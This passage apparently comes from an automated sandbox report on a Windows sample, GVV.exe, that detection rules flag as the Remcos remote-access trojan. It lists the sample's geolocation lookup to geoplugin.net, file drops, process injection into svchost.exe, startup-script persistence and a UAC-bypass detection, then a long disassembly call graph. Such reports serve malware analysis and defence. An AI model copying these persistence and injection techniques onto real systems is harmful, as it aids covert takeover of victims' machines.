              Data Ascii: { "geoplugin_request":"191.96.150.225", "geoplugin_status":200, "geoplugin_delay":"3ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              1192.168.2.649717178.237.33.5080592C:\Windows\SysWOW64\svchost.exe
              TimestampBytes transferredDirectionData
              May 2, 2024 15:10:18.624363899 CEST71OUTGET /json.gp HTTP/1.1
              Host: geoplugin.net
              Cache-Control: no-cache
              May 2, 2024 15:10:18.792819023 CEST1173INHTTP/1.1 200 OK
              date: Thu, 02 May 2024 13:10:18 GMT
              server: Apache
              content-length: 965
              content-type: application/json; charset=utf-8
              cache-control: public, max-age=300
              access-control-allow-origin: *
              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 [TRUNCATED]
              Data Ascii: { "geoplugin_request":"191.96.150.225", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              General

              Target ID:0
              Start time:15:06:49
              Start date:02/05/2024
              Path:C:\Users\user\Desktop\GVV.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\GVV.exe"
              Imagebase:0x110000
              File size:1'369'600 bytes
              MD5 hash:FA3641C75D2BEB68C01E8065EEFC4707
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:true

              General

              Target ID:4
              Start time:15:09:54
              Start date:02/05/2024
              Path:C:\Users\user\AppData\Local\silvexes\deblaterate.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\GVV.exe"
              Imagebase:0x470000
              File size:116'712'960 bytes
              MD5 hash:67B3857DEE4F4219F088B87902BFF4B0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
              Antivirus matches:
              • Detection: 100%, Joe Sandbox ML
              Reputation:low
              Has exited:true

              General

              Target ID:5
              Start time:15:09:55
              Start date:02/05/2024
              Path:C:\Windows\SysWOW64\svchost.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\GVV.exe"
              Imagebase:0x180000
              File size:46'504 bytes
              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.4071719764.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.4071719764.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.4071719764.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.4071719764.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000005.00000002.4071719764.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
              Reputation:moderate
              Has exited:true

              General

              Target ID:9
              Start time:15:09:57
              Start date:02/05/2024
              Path:C:\Windows\SysWOW64\WerFault.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2248 -s 1456
              Imagebase:0xa80000
              File size:483'680 bytes
              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:12
              Start time:15:10:05
              Start date:02/05/2024
              Path:C:\Windows\SysWOW64\WerFault.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2248 -s 1456
              Imagebase:0xa80000
              File size:483'680 bytes
              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:13
              Start time:15:10:07
              Start date:02/05/2024
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs"
              Imagebase:0x7ff622df0000
              File size:170'496 bytes
              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:14
              Start time:15:10:13
              Start date:02/05/2024
              Path:C:\Users\user\AppData\Local\silvexes\deblaterate.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Local\silvexes\deblaterate.exe"
              Imagebase:0x470000
              File size:116'712'960 bytes
              MD5 hash:67B3857DEE4F4219F088B87902BFF4B0
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.4105973198.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.4105973198.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000002.4105973198.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000E.00000002.4105973198.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000E.00000002.4105973198.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
              Reputation:low
              Has exited:true

              General

              Target ID:15
              Start time:15:10:14
              Start date:02/05/2024
              Path:C:\Windows\SysWOW64\svchost.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Local\silvexes\deblaterate.exe"
              Imagebase:0x180000
              File size:46'504 bytes
              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.4490357990.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.4490357990.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000002.4490357990.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000F.00000002.4490357990.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000F.00000002.4490357990.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
              Reputation:moderate
              Has exited:false

              Disassembly

              Reset < >

                Execution Graph

                Execution Coverage:2.9%
                Dynamic/Decrypted Code Coverage:0.4%
                Signature Coverage:2.9%
                Total number of Nodes:2000
                Total number of Limit Nodes:42
                execution_graph 96870 111033 96875 114c91 96870->96875 96874 111042 96883 11a961 96875->96883 96879 114d9c 96880 111038 96879->96880 96891 1151f7 22 API calls __fread_nolock 96879->96891 96882 1300a3 29 API calls __onexit 96880->96882 96882->96874 96892 12fe0b 96883->96892 96885 11a976 96902 12fddb 96885->96902 96887 114cff 96888 113af0 96887->96888 96927 113b1c 96888->96927 96891->96879 96894 12fddb 96892->96894 96895 12fdfa 96894->96895 96899 12fdfc 96894->96899 96912 13ea0c 96894->96912 96919 134ead 7 API calls 2 library calls 96894->96919 96895->96885 96897 13066d 96921 1332a4 RaiseException 96897->96921 96899->96897 96920 1332a4 RaiseException 96899->96920 96900 13068a 96900->96885 96904 12fde0 96902->96904 96903 13ea0c ___std_exception_copy 21 API calls 96903->96904 96904->96903 96905 12fdfa 96904->96905 96907 12fdfc 96904->96907 96924 134ead 7 API calls 2 library calls 96904->96924 96905->96887 96908 13066d 96907->96908 96925 1332a4 RaiseException 96907->96925 96926 1332a4 RaiseException 96908->96926 96910 13068a 96910->96887 96917 143820 __dosmaperr 96912->96917 96913 14385e 96923 13f2d9 20 API calls __dosmaperr 96913->96923 96914 143849 RtlAllocateHeap 96916 14385c 96914->96916 96914->96917 96916->96894 96917->96913 96917->96914 96922 134ead 7 API calls 2 library calls 96917->96922 96919->96894 96920->96897 96921->96900 96922->96917 96923->96916 96924->96904 96925->96908 96926->96910 96928 113b0f 96927->96928 96929 113b29 96927->96929 96928->96879 96929->96928 96930 113b30 RegOpenKeyExW 96929->96930 96930->96928 96931 113b4a RegQueryValueExW 96930->96931 96932 113b80 RegCloseKey 96931->96932 96933 113b6b 96931->96933 96932->96928 96933->96932 96934 112e37 96935 11a961 22 API calls 96934->96935 96936 112e4d 96935->96936 97013 114ae3 96936->97013 96938 112e6b 97027 113a5a 96938->97027 96940 112e7f 97034 119cb3 96940->97034 96945 152cb0 97082 182cf9 96945->97082 96946 112ead 97062 11a8c7 96946->97062 96948 152cc3 96950 152ccf 96948->96950 97108 114f39 96948->97108 96955 114f39 68 API calls 96950->96955 96951 112ec3 97066 116f88 22 API calls 96951->97066 96954 112ecf 96957 119cb3 22 API calls 96954->96957 96956 152ce5 96955->96956 97114 113084 22 API calls 96956->97114 96958 112edc 96957->96958 97067 11a81b 41 API calls 96958->97067 96961 112eec 96963 119cb3 22 API calls 96961->96963 96962 152d02 97115 113084 22 API calls 96962->97115 96965 112f12 96963->96965 97068 11a81b 41 API calls 96965->97068 96966 152d1e 96968 113a5a 24 API calls 96966->96968 96970 152d44 96968->96970 96969 112f21 96972 11a961 22 API calls 96969->96972 97116 113084 22 API calls 96970->97116 96974 112f3f 96972->96974 96973 152d50 96975 11a8c7 22 API calls 96973->96975 97069 113084 22 API calls 96974->97069 96976 152d5e 96975->96976 97117 113084 22 API calls 96976->97117 96979 112f4b 97070 134a28 40 API calls 3 library calls 96979->97070 96980 152d6d 96984 11a8c7 22 API calls 96980->96984 96982 112f59 96982->96956 96983 112f63 96982->96983 97071 134a28 40 API calls 3 library calls 96983->97071 96986 152d83 96984->96986 97118 113084 22 API calls 96986->97118 96987 112f6e 96987->96962 96989 112f78 96987->96989 97072 134a28 40 API calls 3 library calls 96989->97072 96990 152d90 96992 112f83 96992->96966 96993 112f8d 96992->96993 97073 134a28 40 API calls 3 library calls 96993->97073 96995 112f98 96996 112fdc 96995->96996 97074 113084 22 API calls 96995->97074 96996->96980 96997 112fe8 96996->96997 96997->96990 97076 1163eb 22 API calls 96997->97076 96999 112fbf 97001 11a8c7 22 API calls 96999->97001 97003 112fcd 97001->97003 97002 112ff8 97077 116a50 22 API calls 97002->97077 97075 113084 22 API calls 97003->97075 97005 113006 97078 1170b0 23 API calls 97005->97078 97010 113021 97011 113065 97010->97011 97079 116f88 22 API calls 97010->97079 97080 1170b0 23 API calls 97010->97080 97081 113084 22 API calls 97010->97081 97014 114af0 __wsopen_s 97013->97014 97016 114b22 97014->97016 97122 116b57 97014->97122 97026 114b58 97016->97026 97119 114c6d 97016->97119 97018 119cb3 22 API calls 97020 114c52 97018->97020 97019 119cb3 22 API calls 97019->97026 97021 11515f 22 API calls 97020->97021 97024 114c5e 97021->97024 97022 114c6d 22 API calls 97022->97026 97024->96938 97025 114c29 97025->97018 97025->97024 97026->97019 97026->97022 97026->97025 97134 11515f 97026->97134 97151 151f50 97027->97151 97030 119cb3 22 API calls 97031 113a8d 97030->97031 97153 113aa2 97031->97153 97033 113a97 97033->96940 97035 119cc2 _wcslen 97034->97035 97036 12fe0b 22 API calls 97035->97036 97037 119cea __fread_nolock 97036->97037 97038 12fddb 22 API calls 97037->97038 97039 112e8c 97038->97039 97040 114ecb 97039->97040 97173 114e90 LoadLibraryA 97040->97173 97045 114ef6 LoadLibraryExW 97181 114e59 LoadLibraryA 97045->97181 97046 153ccf 97048 114f39 68 API calls 97046->97048 97050 153cd6 97048->97050 97052 114e59 3 API calls 97050->97052 97054 153cde 97052->97054 97053 114f20 97053->97054 97055 114f2c 97053->97055 97203 1150f5 97054->97203 97056 114f39 68 API calls 97055->97056 97059 112ea5 97056->97059 97059->96945 97059->96946 97061 153d05 97063 11a8ea __fread_nolock 97062->97063 97064 11a8db 97062->97064 97063->96951 97064->97063 97065 12fe0b 22 API calls 97064->97065 97065->97063 97066->96954 97067->96961 97068->96969 97069->96979 97070->96982 97071->96987 97072->96992 97073->96995 97074->96999 97075->96996 97076->97002 97077->97005 97078->97010 97079->97010 97080->97010 97081->97010 97083 182d15 97082->97083 97084 11511f 64 API calls 97083->97084 97085 182d29 97084->97085 97448 182e66 75 API calls 97085->97448 97087 182d3b 97088 1150f5 40 API calls 97087->97088 97107 182d3f 97087->97107 97089 182d56 97088->97089 97090 1150f5 40 API calls 97089->97090 97091 182d66 97090->97091 97092 1150f5 40 API calls 97091->97092 97093 182d81 97092->97093 97094 1150f5 40 API calls 97093->97094 97095 182d9c 97094->97095 97096 11511f 64 API calls 97095->97096 97097 182db3 97096->97097 97098 13ea0c ___std_exception_copy 21 API calls 97097->97098 97099 182dba 97098->97099 97100 13ea0c ___std_exception_copy 21 API calls 97099->97100 97101 182dc4 97100->97101 97102 1150f5 40 API calls 97101->97102 97103 182dd8 97102->97103 97449 1828fe 27 API calls 97103->97449 97105 182dee 97105->97107 97450 1822ce 97105->97450 97107->96948 97109 114f43 97108->97109 97110 114f4a 97108->97110 97111 13e678 67 API calls 97109->97111 97112 114f59 97110->97112 97113 114f6a FreeLibrary 97110->97113 97111->97110 97112->96950 97113->97112 97114->96962 97115->96966 97116->96973 97117->96980 97118->96990 97140 11aec9 97119->97140 97121 114c78 97121->97016 97123 154ba1 97122->97123 97124 116b67 _wcslen 97122->97124 97147 1193b2 97123->97147 97127 116ba2 97124->97127 97128 116b7d 97124->97128 97126 154baa 97126->97126 97130 12fddb 22 API calls 97127->97130 97146 116f34 22 API calls 97128->97146 97132 116bae 97130->97132 97131 116b85 __fread_nolock 97131->97016 97133 12fe0b 22 API calls 97132->97133 97133->97131 97135 11516e 97134->97135 97139 11518f __fread_nolock 97134->97139 97137 12fe0b 22 API calls 97135->97137 97136 12fddb 22 API calls 97138 1151a2 97136->97138 97137->97139 97138->97026 97139->97136 97141 11aedc 97140->97141 97145 11aed9 __fread_nolock 97140->97145 97142 12fddb 22 API calls 97141->97142 97143 11aee7 97142->97143 97144 12fe0b 22 API calls 97143->97144 97144->97145 97145->97121 97146->97131 97148 1193c0 97147->97148 97150 1193c9 __fread_nolock 97147->97150 97149 11aec9 22 API calls 97148->97149 97148->97150 97149->97150 97150->97126 97152 113a67 GetModuleFileNameW 97151->97152 97152->97030 97154 151f50 __wsopen_s 97153->97154 97155 113aaf GetFullPathNameW 97154->97155 97156 113ae9 97155->97156 97157 113ace 97155->97157 97167 11a6c3 97156->97167 97158 116b57 22 API calls 97157->97158 97160 113ada 97158->97160 97163 1137a0 97160->97163 97164 1137ae 97163->97164 97165 1193b2 22 API calls 97164->97165 97166 1137c2 97165->97166 97166->97033 97168 11a6dd 97167->97168 97172 11a6d0 97167->97172 97169 12fddb 22 API calls 97168->97169 97170 11a6e7 97169->97170 97171 12fe0b 22 API calls 97170->97171 97171->97172 97172->97160 97174 114ec6 97173->97174 97175 114ea8 GetProcAddress 97173->97175 97178 13e5eb 97174->97178 97176 114eb8 97175->97176 97176->97174 97177 114ebf FreeLibrary 97176->97177 97177->97174 97209 13e52a 97178->97209 97180 114eea 97180->97045 97180->97046 97182 114e8d 97181->97182 97183 114e6e GetProcAddress 97181->97183 97186 114f80 97182->97186 97184 114e7e 97183->97184 97184->97182 97185 114e86 FreeLibrary 97184->97185 97185->97182 97187 12fe0b 22 API calls 97186->97187 97188 114f95 97187->97188 97270 115722 97188->97270 97190 114fa1 __fread_nolock 97191 1150a5 97190->97191 97192 153d1d 97190->97192 97202 114fdc 97190->97202 97273 1142a2 CreateStreamOnHGlobal 97191->97273 97284 18304d 74 API calls 97192->97284 97195 153d22 97197 11511f 64 API calls 97195->97197 97196 1150f5 40 API calls 97196->97202 97198 153d45 97197->97198 97199 1150f5 40 API calls 97198->97199 97201 11506e ISource 97199->97201 97201->97053 97202->97195 97202->97196 97202->97201 97279 11511f 97202->97279 97204 115107 97203->97204 97207 153d70 97203->97207 97306 13e8c4 97204->97306 97208 1828fe 27 API calls 97208->97061 97211 13e536 ___scrt_is_nonwritable_in_current_image 97209->97211 97210 13e544 97234 13f2d9 20 API calls __dosmaperr 97210->97234 97211->97210 97213 13e574 97211->97213 97216 13e586 97213->97216 97217 13e579 97213->97217 97214 13e549 97235 1427ec 26 API calls __cftof 97214->97235 97226 148061 97216->97226 97236 13f2d9 20 API calls __dosmaperr 97217->97236 97220 13e554 __fread_nolock 97220->97180 97221 13e58f 97222 13e5a2 97221->97222 97223 13e595 97221->97223 97238 13e5d4 LeaveCriticalSection __fread_nolock 97222->97238 97237 13f2d9 20 API calls __dosmaperr 97223->97237 97227 14806d ___scrt_is_nonwritable_in_current_image 97226->97227 97239 142f5e EnterCriticalSection 97227->97239 97229 14807b 97240 1480fb 97229->97240 97233 1480ac __fread_nolock 97233->97221 97234->97214 97235->97220 97236->97220 97237->97220 97238->97220 97239->97229 97246 14811e 97240->97246 97241 148088 97254 1480b7 97241->97254 97242 148177 97259 144c7d 20 API calls 2 library calls 97242->97259 97244 148180 97260 1429c8 97244->97260 97246->97241 97246->97242 97257 13918d EnterCriticalSection 97246->97257 97258 1391a1 LeaveCriticalSection 97246->97258 97248 148189 97248->97241 97266 143405 11 API calls 2 library calls 97248->97266 97250 1481a8 97267 13918d EnterCriticalSection 97250->97267 97253 1481bb 97253->97241 97269 142fa6 LeaveCriticalSection 97254->97269 97256 1480be 97256->97233 97257->97246 97258->97246 97259->97244 97261 1429fc _free 97260->97261 97262 1429d3 RtlFreeHeap 97260->97262 97261->97248 97262->97261 97263 1429e8 97262->97263 97268 13f2d9 20 API calls __dosmaperr 97263->97268 97265 1429ee GetLastError 97265->97261 97266->97250 97267->97253 97268->97265 97269->97256 97271 12fddb 22 API calls 97270->97271 97272 115734 97271->97272 97272->97190 97274 1142bc FindResourceExW 97273->97274 97278 1142d9 97273->97278 97275 1535ba LoadResource 97274->97275 97274->97278 97276 1535cf SizeofResource 97275->97276 97275->97278 97277 1535e3 LockResource 97276->97277 97276->97278 97277->97278 97278->97202 97280 153d90 97279->97280 97281 11512e 97279->97281 97285 13ece3 97281->97285 97284->97195 97288 13eaaa 97285->97288 97287 11513c 97287->97202 97289 13eab6 ___scrt_is_nonwritable_in_current_image 97288->97289 97290 13eac2 97289->97290 97292 13eae8 97289->97292 97301 13f2d9 20 API calls __dosmaperr 97290->97301 97303 13918d EnterCriticalSection 97292->97303 97294 13eac7 97302 1427ec 26 API calls __cftof 97294->97302 97295 13eaf4 97304 13ec0a 62 API calls 2 library calls 97295->97304 97298 13eb08 97305 13eb27 LeaveCriticalSection __fread_nolock 97298->97305 97300 13ead2 __fread_nolock 97300->97287 97301->97294 97302->97300 97303->97295 97304->97298 97305->97300 97309 13e8e1 97306->97309 97308 115118 97308->97208 97310 13e8ed ___scrt_is_nonwritable_in_current_image 97309->97310 97311 13e92d 97310->97311 97312 13e925 __fread_nolock 97310->97312 97318 13e900 ___scrt_fastfail 97310->97318 97322 13918d EnterCriticalSection 97311->97322 97312->97308 97315 13e937 97323 13e6f8 97315->97323 97316 13e91a 97337 1427ec 26 API calls __cftof 97316->97337 97336 13f2d9 20 API calls __dosmaperr 97318->97336 97322->97315 97325 13e70a ___scrt_fastfail 97323->97325 97329 13e727 97323->97329 97324 13e717 97411 13f2d9 20 API calls __dosmaperr 97324->97411 97325->97324 97325->97329 97331 13e76a __fread_nolock 97325->97331 97327 13e71c 97412 1427ec 26 API calls __cftof 97327->97412 97338 13e96c LeaveCriticalSection __fread_nolock 97329->97338 97330 13e886 ___scrt_fastfail 97414 13f2d9 20 API calls __dosmaperr 97330->97414 97331->97329 97331->97330 97339 13d955 97331->97339 97346 148d45 97331->97346 97413 13cf78 26 API calls 4 library calls 97331->97413 97336->97316 97337->97312 97338->97312 97340 13d961 97339->97340 97341 13d976 97339->97341 97415 13f2d9 20 API calls __dosmaperr 97340->97415 97341->97331 97343 13d966 97416 1427ec 26 API calls __cftof 97343->97416 97345 13d971 97345->97331 97347 148d57 97346->97347 97348 148d6f 97346->97348 97426 13f2c6 20 API calls __dosmaperr 97347->97426 97350 1490d9 97348->97350 97355 148db4 97348->97355 97442 13f2c6 20 API calls __dosmaperr 97350->97442 97351 148d5c 97427 13f2d9 20 API calls __dosmaperr 97351->97427 97354 1490de 97443 13f2d9 20 API calls __dosmaperr 97354->97443 97356 148d64 97355->97356 97358 148dbf 97355->97358 97363 148def 97355->97363 97356->97331 97428 13f2c6 20 API calls __dosmaperr 97358->97428 97359 148dcc 97444 1427ec 26 API calls __cftof 97359->97444 97361 148dc4 97429 13f2d9 20 API calls __dosmaperr 97361->97429 97365 148e08 97363->97365 97366 148e2e 97363->97366 97367 148e4a 97363->97367 97365->97366 97399 148e15 97365->97399 97430 13f2c6 20 API calls __dosmaperr 97366->97430 97433 143820 21 API calls 2 library calls 97367->97433 97370 148e33 97431 13f2d9 20 API calls __dosmaperr 97370->97431 97371 148e61 97374 1429c8 _free 20 API calls 97371->97374 97377 148e6a 97374->97377 97375 148fb3 97378 149029 97375->97378 97380 148fcc GetConsoleMode 97375->97380 97376 148e3a 97432 1427ec 26 API calls __cftof 97376->97432 97381 1429c8 _free 20 API calls 97377->97381 97382 14902d ReadFile 97378->97382 97380->97378 97383 148fdd 97380->97383 97384 148e71 97381->97384 97385 149047 97382->97385 97386 1490a1 GetLastError 97382->97386 97383->97382 97387 148fe3 ReadConsoleW 97383->97387 97388 148e96 97384->97388 97389 148e7b 97384->97389 97385->97386 97392 14901e 97385->97392 97390 149005 97386->97390 97391 1490ae 97386->97391 97387->97392 97394 148fff GetLastError 97387->97394 97436 149424 28 API calls __wsopen_s 97388->97436 97434 13f2d9 20 API calls __dosmaperr 97389->97434 97408 148e45 __fread_nolock 97390->97408 97437 13f2a3 20 API calls 2 library calls 97390->97437 97440 13f2d9 20 API calls __dosmaperr 97391->97440 97403 149083 97392->97403 97404 14906c 97392->97404 97392->97408 97394->97390 97395 1429c8 _free 20 API calls 97395->97356 97398 1490b3 97441 13f2c6 20 API calls __dosmaperr 97398->97441 97417 14f89b 97399->97417 97401 148e80 97435 13f2c6 20 API calls __dosmaperr 97401->97435 97407 14909a 97403->97407 97403->97408 97438 148a61 31 API calls 4 library calls 97404->97438 97439 1488a1 29 API calls __wsopen_s 97407->97439 97408->97395 97410 14909f 97410->97408 97411->97327 97412->97329 97413->97331 97414->97327 97415->97343 97416->97345 97418 14f8a8 97417->97418 97420 14f8b5 97417->97420 97445 13f2d9 20 API calls __dosmaperr 97418->97445 97422 14f8c1 97420->97422 97446 13f2d9 20 API calls __dosmaperr 97420->97446 97421 14f8ad 97421->97375 97422->97375 97424 14f8e2 97447 1427ec 26 API calls __cftof 97424->97447 97426->97351 97427->97356 97428->97361 97429->97359 97430->97370 97431->97376 97432->97408 97433->97371 97434->97401 97435->97408 97436->97399 97437->97408 97438->97408 97439->97410 97440->97398 97441->97408 97442->97354 97443->97359 97444->97356 97445->97421 97446->97424 97447->97421 97448->97087 97449->97105 97451 1822e7 97450->97451 97452 1822d9 97450->97452 97454 18232c 97451->97454 97455 13e5eb 29 API calls 97451->97455 97465 1822f0 97451->97465 97453 13e5eb 29 API calls 97452->97453 97453->97451 97479 182557 97454->97479 97457 182311 97455->97457 97457->97454 97458 18231a 97457->97458 97462 13e678 67 API calls 97458->97462 97458->97465 97459 182370 97460 182374 97459->97460 97461 182395 97459->97461 97464 182381 97460->97464 97467 13e678 67 API calls 97460->97467 97483 182171 97461->97483 97462->97465 97464->97465 97470 13e678 67 API calls 97464->97470 97465->97107 97466 18239d 97468 1823c3 97466->97468 97469 1823a3 97466->97469 97467->97464 97490 1823f3 97468->97490 97472 13e678 67 API calls 97469->97472 97474 1823b0 97469->97474 97470->97465 97472->97474 97473 1823ca 97476 1823de 97473->97476 97498 13e678 97473->97498 97474->97465 97475 13e678 67 API calls 97474->97475 97475->97465 97476->97465 97478 13e678 67 API calls 97476->97478 97478->97465 97480 18257c 97479->97480 97482 182565 __fread_nolock 97479->97482 97481 13e8c4 __fread_nolock 40 API calls 97480->97481 97481->97482 97482->97459 97484 13ea0c ___std_exception_copy 21 API calls 97483->97484 97485 18217f 97484->97485 97486 13ea0c ___std_exception_copy 21 API calls 97485->97486 97487 182190 97486->97487 97488 13ea0c ___std_exception_copy 21 API calls 97487->97488 97489 18219c 97488->97489 97489->97466 97494 182408 97490->97494 97491 1824c0 97515 182724 97491->97515 97493 1821cc 40 